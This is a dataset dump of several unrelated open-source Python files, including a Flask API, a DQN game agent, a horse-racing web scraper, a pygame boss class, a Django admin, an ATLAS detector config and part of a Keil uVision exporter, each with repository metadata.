\"Internal Server Error! We are working on it!\"\n }), HTTP_500_INTERNAL_SERVER_ERROR\n\n\n db.create_all()\n\n return app\n\n\nif __name__ == \"__main__\":\n create_app()\n\n# Hapat (https://www.youtube.com/watch?v=WFzRy8KVcrM)\n# 1. Project introduction and demo\n# 2. Project setup\n# 3. Flask API folder structure\n# 4. Flask API Blueprints\n# 5. Database and Models setup\n# 6. HTTPS Status Codes\n# 7. User Registration\n# 8. User Login\n# 9. Route Protection\n# 10. Refresh Token\n# 11. Create and Retrieve Records ( C R )\n# 12. Pagination\n# 13. Retrieve One\n# 14. Editing Items ( U )\n# 15. Deleting Items ( D )\n# 16. User Link Click Tracking\n# 17. Error Handling\n# 18. Get Link Stats\n# 19. Swagger Documentation (How api is structured and how is should be accessed - Flasgger(automatic tool to document))\n # -> pip install flasgger\n # -> config -> swagger.py\n # -> create yaml files and decorate view functions with swag_from decorator\n # -> /apispec.json ---> ben te mundur exportimin e ketij dokumentimi. PSH ne Postman -> File -> Import\n# 20. Heroku Deployment","repo_name":"mauranmango/bookmark-api","sub_path":"src/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23323054728","text":"# pseudocode\n# 1.create 2 new lists\n# 2.iterate in the data given\n# 3. append to the 2 lists created respectively\n# 4. enter the data to the pygal\n\ndata = [\n {'month':'January','total':22},\n {'month':'February','total':27},\n {'month':'March','total':23},\n {'month':'April','total':20},\n {'month':'May','total':12},\n]\nx=[]\ny=[]\nfor each in data:\n #print(each['month'])\n x.append(each['month'])\n y.append(each['total'])\nprint(x)\nprint(y)","repo_name":"Ofucho/flask","sub_path":"templates/months.py","file_name":"months.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20332901896","text":"from brain import *\nfrom memory import *\nimport math\n\nclass Skiier:\n def __init__(self, action_space, LEARNING_RATE, GAMMA, LAMBDA, MEMORY_CAPACITY, BATCH_SIZE, max_explore_game, repeat_freq):\n #Hyperparameters\n self.MEMORY_CAPACITY = MEMORY_CAPACITY\n self.BATCH_SIZE = BATCH_SIZE\n self.GAMMA = GAMMA\n self.MAX_EPSILON = 1\n self.MIN_EPSILON = 0.01\n self.LAMBDA = LAMBDA\n self.repeat_freq = repeat_freq\n #Initialization\n self.action_space = action_space\n self.state_size = (125, 80, repeat_freq)\n self.brain = Brain(LEARNING_RATE, input_shape = self.state_size, model_print = False)\n self.memory = Memory(self.MEMORY_CAPACITY)\n self.epsilon = 1\n self.max_explore_game = max_explore_game\n self.episode = 0\n \n def act(self, state):\n if np.random.rand() <= self.epsilon:\n return np.random.choice(self.action_space, size=1)[0]\n else:\n action_values = self.brain.predict(np.expand_dims(state, axis=0))\n action = np.argmax(action_values)\n return action\n \n def observe(self, state, action, reward, next_state, done):\n observation = (state, action, reward, next_state, done)\n self.memory.add(observation)\n \n def replay(self):\n \"\"\"\n Replay helps the model map the current state to the discounted \n reward for the action taken at that state\n \"\"\"\n batch = self.memory.sample(self.BATCH_SIZE)\n batch_len = len(batch)\n \n #Setting up batch to train model\n x = np.zeros((batch_len, self.state_size[0], self.state_size[1], self.state_size[2]))\n y = np.zeros((batch_len, self.action_space))\n \n #Setting up states batch\n states = np.asarray([ obs[0] for obs in batch ])\n #states = states.transpose(0,2,3,1)\n \n #Setting up future states batch\n no_state = np.zeros((1,self.state_size[0], self.state_size[1], self.state_size[2]))\n states_f = np.array([ (no_state if obs[4] is None else obs[3]) for obs in batch ])\n #states_f = states_f.transpose(0,2,3,1)\n \n #print(\"states shape:\", states.shape)\n #old predicted Q values\n action_predictions = self.brain.predict(states)\n #new predicted Q values\n action_predictions_f = self.brain.predict(states_f)\n print(\"future_states\",states_f.shape)\n print(\"action_predictions_f\",action_predictions_f.shape)\n \n #Future Q values\n targets_f = []\n \n for batch_index in range(batch_len):\n state, action, reward, next_state, done = batch[batch_index]\n \n if done:\n target = reward\n else:\n action_prediction_f = action_predictions_f[batch_index]\n target = reward + self.GAMMA * np.amax(action_prediction_f) #[0]\n \n target_f = action_predictions[batch_index]\n print(\"target_f\",target_f.shape)\n \n target_f[action] = target #[0]\n targets_f.append(target_f)\n \n #self.epsilon = (self.MIN_EPSILON + (self.MAX_EPSILON - self.MIN_EPSILON) \n # * math.exp(-self.LAMBDA * self.episode))\n if self.episode <= self.max_explore_game:\n self.epsilon = (((self.MIN_EPSILON-self.MAX_EPSILON)/self.max_explore_game)*self.episode\n + self.MAX_EPSILON)\n else:\n self.epsilon = self.MIN_EPSILON\n self.brain.train(states, np.asarray(targets_f), epochs=1)","repo_name":"adrian-botta/downhill_skiier_DQN","sub_path":"skiier_v0.py","file_name":"skiier_v0.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21321998760","text":"import scrapy\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\nimport pprint\nimport csv\nimport requests\nimport sys\n\nfrom .helper.helper import get_horse_chi_name, get_jockey_chi_name, get_trainer_chi_name, get_horse_game_history, get_result_by_distance, get_class_change, get_hourse_condition, get_horse_age\n\nclass RecentMatchSpider(scrapy.Spider):\n name = 'RecentMatch_crawler'\n allowed_domains = ['bet.hkjc.com']\n start_urls = ['https://bet.hkjc.com/racing/pages/odds_wp.aspx/?lang=ch']\n match_content = dict()\n\n def parse(self, response):\n url = self.start_urls[0]\n match_info = response.xpath('//div[@class=\"mtgInfoDV\"]//text()').extract()\n self.match_date = match_info[0]\n self.match_date = self.match_date[:self.match_date.find(',')]\n self.match_date = datetime.strptime(self.match_date, '%d/%m/%Y')\n self.match_date = datetime.strftime(self.match_date, '%Y/%m/%d')\n self.match_content['match_date'] = self.match_date\n self.match_place = [match_info[-1]] # chinese place name\n # Get the English place name\n englist_info = requests.get('https://bet.hkjc.com/racing/pages/odds_wp.aspx/?lang=en')\n englist_info = BeautifulSoup(englist_info.content, 'html.parser') #Get the English place name\n match_place_eng = englist_info.find('div', attrs={'class': \"mtgInfoDV\"}).text\n match_place_eng = match_place_eng.split(',')[-1]\n match_place_eng = match_place_eng.lower().strip()\n self.match_place.append(match_place_eng)\n\n self.match_content['match_date'] = self.match_date\n self.match_content['match_place'] = self.match_place\n\n number_of_match = len(response.xpath('//div[contains(@id, \"raceSel\")]').extract())\n for race_number in range(1, number_of_match+1):\n match_info_url = 'https://bet.hkjc.com/racing/index.aspx/?lang=en&date={}&venue=ST&raceno={}'.format(self.match_date, race_number)\n yield scrapy.Request(match_info_url, callback=self.match_detail)\n #pprint.pprint(self.match_content)\n\n # match_info_url = 'https://bet.hkjc.com/racing/index.aspx/?lang=en&date={}&venue=ST&raceno={}'.format(self.match_date, 1)\n # yield scrapy.Request(match_info_url, callback=self.match_detail)\n\n def match_detail(self, response):\n '''\n :param response:\n :return:\n match_content = {'race_number':\n {'Race Info': [race_time, race_class, race_course, race_distance],\n {'Race Horse': {'number': str(),\n 'name': str(),\n 'draw': int(),\n 'jockey': str(),\n 'trainer': str(),\n 'last 6 Runs': list(),\n 'same distance game result': list(),\n 'class change': str()}}},\n 'match_date': str(),\n 'match_place': str()\n\n }\n '''\n\n race_number = response.xpath('//div[contains(@style, \"float:left;vertical-align:middle;width:85%\")]/span/strong/text()').extract_first()\n self.match_content[race_number] = dict()\n #Race Info\n race_info = response.xpath('//div[contains(@style, \"float:left;vertical-align:middle;width:85%\")]/span[contains(@class, \"content\")]//text()').extract()\n race_time = race_info[3].replace(',','').lower().strip()\n race_class = race_info[5].replace(',','').lower().strip()\n race_course = race_info[7].replace(',','').lower().strip()\n race_track = race_info[9].replace(',','').upper().strip().replace('COURSE','').replace('\"','')\n\n if race_course == 'ALL WEATHER TRACK'.lower().strip():\n race_distance = race_info[9].replace(',', '').lower().replace('m', '').strip()\n else:\n race_distance = race_info[11].replace(',','').lower().replace('m','').strip()\n self.match_content[race_number]['Race Info'] = [race_time, race_class, race_course, race_track, race_distance]\n self.match_content[race_number]['Race Horse'] = dict()\n print ('\\n\\n')\n print (race_number)\n print(self.match_content[race_number]['Race Info'])\n #Race Horse\n all_horse = response.xpath('//tr[contains(@height, \"22px\")]').extract()\n #loop over horse\n for horse in all_horse:\n horse = BeautifulSoup(horse, \"html.parser\")\n horse = horse.select(\"td[class*='tableContent']\")\n\n # Draw if no draw then skip it\n skip_row = False\n horse_draw = horse[5].get_text().strip()\n\n try:\n horse_draw = int(horse_draw)\n #self.match_content[race_number]['Race Horse']['draw'] = horse_draw\n except ValueError:\n skip_row = True\n\n if skip_row:\n continue\n # Horse number\n Horse_number = horse[1].get_text()\n try:\n Horse_number = int(Horse_number)\n except:\n Horse_number = 0\n self.match_content[race_number]['Race Horse'][Horse_number] = dict()\n self.match_content[race_number]['Race Horse'][Horse_number]['draw'] = horse_draw\n\n\n #star or plus\n try:\n star = False\n plus = False\n #get all horse image\n imgs = horse[0].findAll('img')\n for img in imgs:\n src = img['src']\n if 'star' in src:\n star = True\n if 'plus' in src:\n plus = True\n except:\n star = None\n plus = None\n self.match_content[race_number]['Race Horse'][Horse_number]['star'] = star\n self.match_content[race_number]['Race Horse'][Horse_number]['plus'] = plus\n\n # Horse Name, Horse Chi Name\n try:\n horse_name = horse[3].get_text().strip()\n horse_chi_name = get_horse_chi_name(horse_name)\n horse_horse_age = get_horse_age(horse_name)\n except:\n horse_chi_name = None\n horse_horse_age = None\n self.match_content[race_number]['Race Horse'][Horse_number]['name'] = horse_chi_name\n self.match_content[race_number]['Race Horse'][Horse_number]['age'] = horse_horse_age\n\n #jockey\n try:\n jockey_name = horse[7].get_text().strip()\n if jockey_name.find('(') > 0: #jockey has (-XX)\n jockey_name = jockey_name[:jockey_name.find('(')].strip()\n jockey_chi_name = get_jockey_chi_name(jockey_name)\n except:\n jockey_chi_name = None\n self.match_content[race_number]['Race Horse'][Horse_number]['jockey'] = jockey_chi_name\n\n # trainer\n try:\n trainer_name = horse[8].get_text().strip()\n trainer_chi_name = get_trainer_chi_name(trainer_name)\n except:\n trainer_chi_name = None\n self.match_content[race_number]['Race Horse'][Horse_number]['trainer'] = trainer_chi_name\n\n ###\n try:\n horse_game_history = get_horse_game_history(horse_name)\n except:\n horse_game_history = None\n ###\n # 'last 6 Runs'\n try:\n all_place = []\n for game in horse_game_history: # loop all the match\n try:\n place = int(game[1])\n except ValueError:\n place = 7 # name as 7 if no place\n all_place.append(place)\n\n while len(all_place) < 6: # if not enough 6 past game\n all_place.append(7) # name as 7 for that match\n\n last_6_place = all_place[:6]\n except:\n last_6_place = []\n self.match_content[race_number]['Race Horse'][Horse_number]['last 6 Runs'] = last_6_place\n\n # 'same distance game result'\n try:\n same_distance = get_result_by_distance(horse_game_history, int(race_distance), self.match_place[-1], self.match_content[race_number]['Race Info'][2])\n except:\n same_distance = []\n self.match_content[race_number]['Race Horse'][Horse_number]['same distance game result'] = same_distance\n\n # class change\n try:\n game_history_class, class_change = get_class_change(horse_game_history, race_class)\n except:\n class_change = None\n game_history_class = None\n self.match_content[race_number]['Race Horse'][Horse_number]['class change'] = class_change\n self.match_content[race_number]['Race Horse'][Horse_number]['game_history_class'] = game_history_class\n\n\n # last game date\n try:\n last_game_date, last_game_days_delta, status = get_hourse_condition(horse_game_history, self.match_date)\n except:\n last_game_date = None\n last_game_days_delta = None\n status = None\n self.match_content[race_number]['Race Horse'][Horse_number]['last game date'] = last_game_date\n self.match_content[race_number]['Race Horse'][Horse_number]['last game date delta'] = last_game_days_delta\n self.match_content[race_number]['Race Horse'][Horse_number]['status'] = status\n print (race_number)\n print (self.match_content[race_number])\n\n\n def closed(self, reason):\n #print (self.match_content.keys())\n total_race = len(self.match_content.keys()) - 2\n print (total_race)\n #pprint.pprint(self.match_content)\n print('Spider ended:', reason)\n\n with open('recent_match.csv', 'w') as recent_csv:\n wr = csv.writer(recent_csv, quoting=csv.QUOTE_ALL)\n heeder_row = ['' for i in range(11)]\n heeder_row += ['Match Date:', self.match_content['match_date'],'','Match Place:', self.match_content['match_place']]\n #wr.writerow(heeder_row)\n #wr.writerow([])\n print (self.match_content)\n for race_num in range(1, total_race+1):\n race_key = 'Race {}'.format(race_num)\n race_row = ['' for i in range(11)] + [race_key]\n #wr.writerow(race_row)\n print ('\\n\\n\\n')\n print (race_key)\n print (self.match_content[race_key])\n match_date = self.match_content['match_date']\n match_course = ''\n if self.match_content[race_key]['Race Info'][2] == 'ALL WEATHER TRACK'.lower():\n match_course = '田泥'\n else:\n if self.match_content['match_place'][-1] == 'sha tin':\n match_course = '田草'\n if self.match_content['match_place'][-1] == 'happy valley':\n match_course = '谷草'\n match_class = self.match_content[race_key]['Race Info'][1]\n match_distance = self.match_content[race_key]['Race Info'][4]\n track = self.match_content[race_key]['Race Info'][3]\n\n\n match_info = ['' for i in range(11)] + ['Match Time:', match_date,\n '',\n '班次:', match_class,\n '',\n '跑道:', self.match_content[race_key]['Race Info'][2],\n '',\n '賽道:', track,\n '',\n '賽程:', match_distance,\n ]\n #wr.writerow(match_info)\n\n wr.writerow (['日期', '場次', '跑道', '班次', '路程', '賽道', '場地狀況', '預計步速', '預計疊數', '預計跑法', '評分優勢',\n '馬號', '王牌', '優先', '檔位', '馬名', '馬齡', '騎師', '練馬師',\n 'last game 1', 'last game 2', 'last game 3', 'last game 4', 'last game 5', 'last game 6',\n '同路程次數', '同路程冠', '同路程亞', '同路程季', '同路程殿',\n '上場班次','兩場前班次','三場次班次','升/降班', '上次比賽日', '離上次比賽日數', '狀態'\n ])\n\n horse_number = 0 # ensure the hourse number will be in order 1 - 14\n\n\n for horse_num, horse_detail in self.match_content[race_key]['Race Horse'].items():\n horse_number += 1\n horse_row = [match_date, race_key, match_course, match_class, match_distance, track]\n for i in range(5):\n horse_row.append('')\n if horse_num != horse_number:\n horse_row.append(horse_number)\n wr.writerow(horse_row)\n #reset\n horse_row = [match_date, race_key, match_course, match_class, match_distance, track]\n for i in range(5):\n horse_row.append('')\n horse_number = horse_num\n # else:\n horse_row.extend([horse_num, horse_detail['plus'], horse_detail['star'], horse_detail['draw'], horse_detail['name'], horse_detail['age'], horse_detail['jockey'], horse_detail['trainer']])\n for place in horse_detail['last 6 Runs']:\n horse_row.append(place)\n for result in horse_detail['same distance game result']:\n horse_row.append(result)\n for i in range(3):\n try:\n content = horse_detail['game_history_class'][i]\n horse_row.append(content)\n except:\n horse_row.append('No game history')\n horse_row.append(horse_detail['class change'])\n horse_row.append(horse_detail['last game date'])\n horse_row.append(horse_detail['last game date delta'])\n horse_row.append(horse_detail['status'])\n\n\n\n wr.writerow(horse_row)\n\n while horse_number <= 14: # less than 14 horse\n horse_row = [match_date, race_key, match_course, match_class, match_distance, track]\n for i in range(5):\n horse_row.append('')\n horse_row.append(horse_number)\n wr.writerow(horse_row)\n horse_number += 1\n\n\n\n #wr.writerow([])\n\n\n\n\n #pprint.pprint(self.match_content)\n\n #\n # ###############\n # ### testing ###\n # ###############\n # tmp_horse = all_horse[-3]\n # tmp_horse = BeautifulSoup(tmp_horse, \"html.parser\")\n # tmp_horse_all_data = tmp_horse.select(\"td[class*='tableContent']\")\n #\n # #Draw if no draw then skip it\n # skip_row = False\n # horse_draw = tmp_horse_all_data[4].get_text().strip()\n # try:\n # horse_draw = int(horse_draw)\n # self.match_content[race_number]['draw'] = horse_draw\n # except ValueError:\n # skip_row = True\n #\n # #number\n # Horse_number = tmp_horse_all_data[1].get_text()\n # try:\n # Horse_number = int(Horse_number)\n # except:\n # pass\n # self.match_content[race_number]['Race Horse']['number'] = Horse_number\n #\n # #Horse Name, Horse Chi Name\n # horse_name = tmp_horse_all_data[3].get_text().strip()\n # horse_chi_name =get_horse_chi_name(horse_name)\n # self.match_content[race_number]['Race Horse']['name'] = horse_chi_name\n #\n # #jockey\n # jockey_name = tmp_horse_all_data[6].get_text().strip()\n # if jockey_name.find('(') > 0: #jockey has (-XX)\n # jockey_name = jockey_name[:jockey_name.find('(')].strip()\n # print (jockey_name)\n # jockey_chi_name = get_jockey_chi_name(jockey_name)\n # self.match_content[race_number]['Race Horse']['jockey'] = jockey_chi_name\n #\n # #trainer\n # trainer_name = tmp_horse_all_data[7].get_text().strip()\n # trainer_chi_name = get_trainer_chi_name(trainer_name)\n # self.match_content[race_number]['Race Horse']['trainer'] = trainer_chi_name\n #\n # ###\n # horse_game_history = get_horse_game_history(horse_name)\n # ###\n # #'last 6 Runs'\n # all_place = []\n # for game in horse_game_history: # loop all the match\n # try:\n # place = int(game[1])\n # except ValueError:\n # place = 7 #name as 7 if no place\n # all_place.append(place)\n #\n # while len(all_place)< 6: #if not enough 6 past game\n # all_place.append(7) #name as 7 for that match\n #\n # last_6_place = all_place[:6]\n # self.match_content[race_number]['Race Horse']['last 6 Runs'] = last_6_place\n #\n # #'same distance game result'\n # same_distance = get_result_by_distance(horse_game_history, int(race_distance))\n # self.match_content[race_number]['Race Horse']['same distance game result'] = same_distance\n #\n # # class change\n # class_change = get_class_change(horse_game_history, race_class)\n # self.match_content[race_number]['Race Horse']['class change'] = class_change\n #\n #\n # pprint.pprint (self.match_content)\n\n\n\n","repo_name":"cfcdavidchan/HKJC","sub_path":"HKJC_crawler/HKJC_crawler/spiders/RecentMatch_crawler.py","file_name":"RecentMatch_crawler.py","file_ext":"py","file_size_in_byte":18453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39097136844","text":"import random\n\nimport pygame\nfrom settings import *\nfrom entity import Entity\nfrom debug import *\nfrom projectile import Projectile\nimport numpy as np\nclass Boss(pygame.sprite.Sprite):\n def __init__(self,pos,groups,player):\n super().__init__(groups)\n\n self.image = pygame.image.load('./graphics/test/boss.png').convert_alpha()\n DEFAULT_IMAGE_SIZE = (256, 276)\n self.image = pygame.transform.scale(self.image, DEFAULT_IMAGE_SIZE)\n self.health = 300\n self.pos = pos\n self.rect = self.image.get_rect(topleft = pos)\n self.attack_direction = pygame.math.Vector2()\n self.projectile_sprites = pygame.sprite.Group()\n self.attacking = False\n self.attack_cooldown = 600\n self.attack_time = None\n self.player = player\n self.victory = False\n def create_bullet(self):\n vector = np.array([self.rect.x - (self.player.get_player_x()), self.rect.y - (self.player.get_player_y())])\n unit_vector = vector / np.linalg.norm(vector)\n return Projectile(self.rect.x + TILESIZE/2,self.rect.y + TILESIZE/2,'boss',-unit_vector,0)\n\n def hit(self, bullets):\n for bullet in bullets:\n if bullet.rect.colliderect(self.rect) and self.health > 0:\n self.health -= bullet_dmg\n if self.health <= 50:\n self.attack_cooldown = 250\n elif self.health <= 100:\n self.attack_cooldown = 350\n elif self.health <= 120:\n self.attack_cooldown = 400\n elif self.health <= 160:\n self.attack_cooldown = 500\n\n if self.health <= 0:\n self.victory = True\n self.kill()\n bullet.kill()\n\n\n def cooldowns(self):\n current_time = pygame.time.get_ticks()\n if self.attacking:\n if current_time - self.attack_time >= self.attack_cooldown:\n self.attacking = False\n\n def get_proj_sp(self):\n return self.projectile_sprites\n\n def shoot(self):\n if not self.attacking:\n self.attacking = True\n self.projectile_sprites.add(self.create_bullet())\n self.attack_time = pygame.time.get_ticks()\n def update(self):\n self.shoot()\n self.cooldowns()\n\n def get_proj_sp(self):\n return self.projectile_sprites\n","repo_name":"paulaabc/Hackathon-bitsxlaMarato-2022","sub_path":"TheBindingOfTrombosis-main/boss.py","file_name":"boss.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17989516405","text":"# AoC 2019 - Day 14a\n\ndef load_data():\n reactions = {}\n with open('example1.txt', 'r') as infile:\n d = infile.read().splitlines()\n for line in d:\n inchem, outchem = map(parse, line.split(' => '))\n\n reactions[outchem[0][1]] = {outchem[0][0]: inchem}\n return reactions\n\ndef parse(ingreds):\n i = []\n for ingred in ingreds.split(', '):\n num, chem = ingred.split(' ')\n i.append([int(num), chem])\n return i\n\ndef find_amount(reactions):\n needs = {'FUEL': 1}\n\n while needs:\n for chem, needed in needs.items():\n amnt, ingreds = reactions[chem]\n mult = needed // amnt\n for i in ingreds:\n needs[i[1]] = needs.get(i[1], 0) + i[0] * mult\n\ndef main():\n find_amount(load_data())\n\nif __name__ == '__main__':\n main()\n","repo_name":"Azcobu/advent-of-code","sub_path":"2019/day14/aoc2019-14a.py","file_name":"aoc2019-14a.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16433905546","text":"from django.contrib import admin\n\n# Register your models here.\nfrom django.contrib import admin\nfrom .models import ParadaDeMaquina, Funcionario, Maquina\nfrom django.contrib.auth.models import Group\nadmin.site.site_header= \" NextMan | admin \"\nadmin.site.site_title = \" NextMan | admin \"\nadmin.site.site_footer = \" Soluções em Sistemas\"\n# Register your models here.\n\n\n\nclass ParadasDeMaquinaAdmin(admin.ModelAdmin):\n list_display = ['id','tipoServico', 'maquina','tipoManutencao','horaOcorencia','horaReinicio', 'duracao','turno','operador','descricao']\n list_filter = ['id','tipoServico', 'maquina','tipoManutencao','horaOcorencia','horaReinicio', 'duracao','turno','operador','descricao']\n #list_editable = ['nomeMaquina', 'motivo', 'tipoManutencao', 'dataParada', 'DataReinicio', 'turno','observacoes']\nadmin.site.register(ParadaDeMaquina,ParadasDeMaquinaAdmin)\n\n\n\n\nclass FuncionarioAdmin(admin.ModelAdmin):\n list_display = ['id','nome', 'funcao']\n list_filter = ['id','nome', 'funcao']\n\nadmin.site.register(Funcionario, FuncionarioAdmin)\n\nclass MaquinaAdmin(admin.ModelAdmin):\n list_display = ['id','nomeMaquina']\n list_filter = ['id','nomeMaquina']\n\nadmin.site.register(Maquina, MaquinaAdmin)","repo_name":"ErmirioABonfim/DjangoHeroku","sub_path":"nextman/ocorrencias/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11884617896","text":"# encoding=utf8\n\n\"\"\" The response object\n Author: lipixun\n Created Time : 三 12/ 2 16:32:06 2015\n\n File Name: response.py\n Description:\n\n\"\"\"\n\nfrom Cookie import SimpleCookie\n\nfrom unifiedrpc.protocol import Response\n\nclass WebResponse(Response):\n \"\"\"The web response\n \"\"\"\n def __init__(self, status = 200, cookies = None, **kwargs):\n \"\"\"Create a new WebResponse\n \"\"\"\n self.status = status\n self.cookies = cookies or SimpleCookie()\n # Super\n super(WebResponse, self).__init__(**kwargs)\n\n def redirect(self, location, code = 302):\n \"\"\"Redirect this response\n \"\"\"\n self.headers[\"Location\"] = location\n self.status = code\n","repo_name":"penfree/pyunified-rpc","sub_path":"unifiedrpc/adapters/web/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71095500353","text":"from AthenaConfiguration.ComponentAccumulator import ComponentAccumulator\nfrom AthenaConfiguration.Enums import Format\n\ndef ZDCRecOutputCfg(flags):\n \"\"\"defines outputs for ESD and AOD; provides the same information as in ForwardRec/ZDC_Rec_OutputItemList_jobOptions.py\"\"\"\n from OutputStreamAthenaPool.OutputStreamConfig import OutputStreamCfg\n acc = ComponentAccumulator()\n \n ZDC_ItemList=[]\n\n if flags.Input.Format is Format.BS:\n # ZDC Silicon hits containers\n ZDC_ItemList.append(\"xAOD::ZdcModuleContainer#ZdcModules\")\n ZDC_ItemList.append(\"xAOD::ZdcModuleAuxContainer#ZdcModulesAux.\")\n\n if flags.Output.doWriteESD:\n acc.merge(OutputStreamCfg(flags, \"ESD\", ZDC_ItemList))\n if flags.Output.doWriteAOD:\n acc.merge(OutputStreamCfg(flags, \"AOD\", ZDC_ItemList))\n return acc\n\n\ndef ZDCRecCfg(flags):\n \"\"\"defines ZDC reconstruction; provides the same setup as used to be in ForwardRec/ForwardRec_jobOptions.py\"\"\"\n acc = ComponentAccumulator()\n \n if flags.Input.Format is Format.BS:\n from AthenaConfiguration.ComponentFactory import CompFactory\n \n acc.addEventAlgo(CompFactory.ZdcByteStreamLucrodData(\"ZdcByteStreamLucrodData\"))\n acc.addEventAlgo(CompFactory.ZdcRecRun3(\"ZdcRecRun3\"))\n \n # Setup output\n if flags.Output.doWriteESD or flags.Output.doWriteAOD:\n acc.merge(ZDCRecOutputCfg(flags))\n \n return acc\n\n\nif __name__ == \"__main__\":\n\n from AthenaConfiguration.AllConfigFlags import initConfigFlags\n flags = initConfigFlags()\n flags.Scheduler.CheckDependencies = True\n flags.Scheduler.ShowDataDeps = True\n flags.Scheduler.ShowDataFlow = True\n flags.Scheduler.ShowControlFlow = True\n flags.Scheduler.EnableVerboseViews = True\n \n flags.Input.Files = [\"/eos/atlas/atlascerngroupdisk/det-zdc/ZDCRuns/2021/data21_900GeV/main/data21_900GeV.00405396.physics_Main.daq.RAW/data21_900GeV.00405396.physics_Main.daq.RAW._lb0211._SFO-13._0001.data\"]\n \n flags.Exec.MaxEvents=500\n flags.Concurrency.NumThreads=4\n \n flags.fillFromArgs() # enable unit tests to switch only parts of reco: python -m HIRecConfig.HIRecConfig HeavyIon.doGlobal = 0 and so on\n flags.lock()\n flags.dump()\n \n from AthenaConfiguration.MainServicesConfig import MainServicesCfg\n acc = MainServicesCfg(flags)\n acc.getEventAlgo(\"SGInputLoader\").FailIfNoProxy = True # enforce no missing data\n \n \n from ByteStreamCnvSvc.ByteStreamConfig import ByteStreamReadCfg\n acc.merge(ByteStreamReadCfg(flags))\n\n acc.merge(ZDCRecCfg(flags))\n \n from AthenaCommon.Constants import DEBUG\n acc.foreach_component(\"*ZDC*\").OutputLevel=DEBUG\n \n acc.printConfig(withDetails=True, summariseProps=True)\n \n status = acc.run()\n if status.isFailure():\n import sys\n sys.exit(-1)\n\n\n","repo_name":"Yusuf-Manjra/athena","sub_path":"ForwardDetectors/ForwardRec/python/ZDCRecConfig.py","file_name":"ZDCRecConfig.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28839628782","text":"import os\nimport subprocess\nimport shutil\nimport logging\nimport xmltodict\nimport copy\nimport re\nfrom codecs import open\n\nfrom os import getcwd\nfrom os.path import basename, join, normpath\nfrom collections import OrderedDict\nfrom project_generator_definitions.definitions import ProGenDef\n\nfrom .tool import Tool, Builder, Exporter\nfrom ..util import SOURCE_KEYS\n\nlogger = logging.getLogger('progen.tools.uvision')\n\nclass uVisionDefinitions():\n\n debuggers = {\n 'ulink2-me': {\n 'uvproj': {\n 'TargetDlls': {\n 'Driver': 'BIN\\\\UL2CM3.dll',\n },\n 'Utilities': {\n 'Flash2': 'BIN\\\\UL2CM3.DLL',\n },\n },\n 'uvoptx' : {\n 'DebugOpt' : {\n 'nTsel' : '1',\n 'pMon': 'BIN\\\\UL2CM3.DLL',\n },\n 'SetRegEntry' : {\n 'Key' : 'UL2CM3',\n },\n },\n },\n 'cmsis-dap': {\n 'uvproj': {\n 'TargetDlls': {\n 'Driver': 'BIN\\\\CMSIS_AGDI.dll',\n },\n 'Utilities': {\n 'Flash2': 'BIN\\\\CMSIS_AGDI.dll',\n },\n },\n 'uvoptx' : {\n 'DebugOpt' : {\n 'nTsel' : '12',\n 'pMon': 'BIN\\\\CMSIS_AGDI.dll',\n },\n 'SetRegEntry' : {\n 'Key' : 'CMSIS_AGDI',\n },\n },\n },\n 'j-link': {\n 'uvproj': {\n 'TargetDlls': {\n 'Driver': 'Segger\\\\JL2CM3.dll',\n },\n 'Utilities': {\n 'Flash2': 'Segger\\\\JL2CM3.dll',\n },\n },\n 'uvoptx' : {\n 'DebugOpt' : {\n 'nTsel' : '6',\n 'pMon': 'Segger\\\\JL2CM3.dll',\n },\n 'SetRegEntry' : {\n 'Key' : 'JL2CM3',\n },\n },\n },\n 'ulink-pro': {\n 'uvproj': {\n 'TargetDlls': {\n 'Driver': 'BIN\\\\ULP2CM3.dll',\n },\n 'Utilities': {\n 'Flash2': 'BIN\\\\ULP2CM3.dll',\n },\n },\n 'uvoptx' : {\n 'DebugOpt' : {\n 'nTsel' : '7',\n 'pMon': 'BIN\\\\ULP2CM3.DLL',\n },\n 'SetRegEntry' : {\n 'Key' : 'ULP2CM3',\n },\n },\n },\n 'st-link': {\n 'uvproj': {\n 'TargetDlls': {\n 'Driver': 'STLink\\\\ST-LINKIII-KEIL_SWO.dll',\n },\n 'Utilities': {\n 'Flash2': 'STLink\\\\ST-LINKIII-KEIL_SWO.dll',\n },\n },\n 'uvoptx' : {\n 'DebugOpt' : {\n 'nTsel' : '11',\n 'pMon': 'STLink\\\\ST-LINKIII-KEIL_SWO.dll',\n },\n 'SetRegEntry' : {\n 'Key' : 'ST-LINKIII-KEIL_SWO',\n },\n },\n },\n 'nu-link': {\n 'uvproj': {\n 'TargetDlls': {\n 'Driver': 'BIN\\\\Nu_Link.dll',\n },\n 'Utilities': {\n 'Flash2': 'BIN\\\\Nu_Link.dll',\n },\n },\n 'uvoptx' : {\n 'DebugOpt' : {\n 'nTsel' : '9',\n 'pMon': 'NULink\\\\Nu_Link.dll',\n },\n 'SetRegEntry' : {\n 'Key' : 'Nu_Link',\n },\n },\n },\n }\n\n # use cmsis-dap debugger as default\n debuggers_default = 'cmsis-dap'\n\n\nclass Uvision(Tool, Builder, Exporter):\n\n optimization_options = ['O0', 'O1', 'O2', 'O3']\n file_types = {'cpp': 8, 'c': 1, 's': 2, 'obj': 3,'o':3, 'lib': 4, 'ar': 4, 'h': 5}\n\n # flags 